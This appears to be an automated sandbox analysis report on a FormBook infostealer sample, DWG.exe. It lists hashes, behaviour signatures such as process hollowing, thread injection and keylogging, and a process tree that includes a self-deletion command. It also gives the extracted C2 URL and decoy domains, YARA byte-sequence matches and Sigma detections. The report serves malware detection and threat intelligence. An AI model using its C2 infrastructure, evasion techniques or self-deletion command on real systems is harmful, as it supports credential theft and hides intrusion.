Play interactive tour

Edit tour

Windows Analysis Report DWG.exe

Overview

General Information

Sample Name:	DWG.exe
Analysis ID:	510733
MD5:	ff882802d113ed02fa070c496f89d797
SHA1:	aad1eed1c53f1d33ab52e13442b036bfeee91f1b
SHA256:	4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Sigma detected: Suspect Svchost Activity

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Self deletion via cmd delete

Sigma detected: Suspicious Svchost Process

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Checks if the current process is being debugged

Potential key logger detected (key state polling based)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

DWG.exe (PID: 6272 cmdline: 'C:\Users\user\Desktop\DWG.exe' MD5: FF882802D113ED02FA070C496F89D797)

DWG.exe (PID: 6240 cmdline: C:\Users\user\Desktop\DWG.exe MD5: FF882802D113ED02FA070C496F89D797)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 6564 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cmd.exe (PID: 6584 cmdline: /c del 'C:\Users\user\Desktop\DWG.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.elsist.online/xzes/"], "decoy": ["dent-works.com", "theravewizards.com", "venkataramanagraphics.com", "overway.store", "alignatura.com", "boggbogs.com", "senerants.tech", "muintel.net", "bestplacementconsultancy.com", "trippresso.com", "communication.services", "xn--maraaestudio-dhb.com", "beandhira.com", "lochnas.com", "update-mind.com", "cpcacursos.com", "metaverse-coaching.com", "skindefense5.com", "distressedthenblessed.com", "alphaore.com", "extrobility.com", "sandyanmax.com", "jntycy.com", "becomingalice.com", "printyourdays.com", "fallet-official.com", "hcbg.online", "era575.com", "dalainstitute.info", "7looks-mocha-totalbeauty.com", "spydasec.com", "vote4simone.net", "cannabeeswax.com", "coalitionloop.com", "skywalkerpressonline.com", "healthybalancedliving.com", "mylistg.com", "bookbqconspicuous.com", "mylyk.net", "mylindiss.com", "xn--80akukchh.xn--80asehdb", "captekbrasil.com", "joannhydeyoga.com", "monenee.xyz", "nishantmohapatra.com", "mindbodyweightlossmethod.com", "sxjcfw.com", "wilbertluna.com", "inclutel.com", "knowsyourdream.com", "uk-gaming.com", "maihengkeji.online", "fragrant-nest.com", "ubfodessa.com", "vipinindustries.com", "narcozland.com", "heros-coaching.com", "austeregomrqg.xyz", "eleonoritalia.com", "publiccoins.online", "dashmints.com", "thebrandstudiointernational.com", "thaikindee.com", "punkidz.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x79a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x136b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x131a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x137b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1392f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x83ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1241c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19c4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ad9:$sqlite3step: 68 34 1C 7B E1 0x15bec:$sqlite3step: 68 34 1C 7B E1 0x15b08:$sqlite3text: 68 38 2A 90 C5 0x15c2d:$sqlite3text: 68 38 2A 90 C5 0x15b1b:$sqlite3blob: 68 53 D8 7F 8C 0x15c43:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x79a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x136b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x131a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x137b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1392f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x83ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1241c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19c4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ad9:$sqlite3step: 68 34 1C 7B E1 0x15bec:$sqlite3step: 68 34 1C 7B E1 0x15b08:$sqlite3text: 68 38 2A 90 C5 0x15c2d:$sqlite3text: 68 38 2A 90 C5 0x15b1b:$sqlite3blob: 68 53 D8 7F 8C 0x15c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ed8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9272:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14f85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14a71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15087:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x151ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9c8a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13cec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xaa02:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a477:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x173a9:$sqlite3step: 68 34 1C 7B E1 0x174bc:$sqlite3step: 68 34 1C 7B E1 0x173d8:$sqlite3text: 68 38 2A 90 C5 0x174fd:$sqlite3text: 68 38 2A 90 C5 0x173eb:$sqlite3blob: 68 53 D8 7F 8C 0x17513:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x79a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x136b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x131a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x137b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1392f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x83ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1241c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19c4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ad9:$sqlite3step: 68 34 1C 7B E1 0x15bec:$sqlite3step: 68 34 1C 7B E1 0x15b08:$sqlite3text: 68 38 2A 90 C5 0x15c2d:$sqlite3text: 68 38 2A 90 C5 0x15b1b:$sqlite3blob: 68 53 D8 7F 8C 0x15c43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.DWG.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.DWG.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.DWG.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.DWG.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.DWG.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.DWG.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.DWG.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.DWG.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.DWG.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.0.DWG.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.DWG.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.DWG.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6564

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6564

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6564

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp

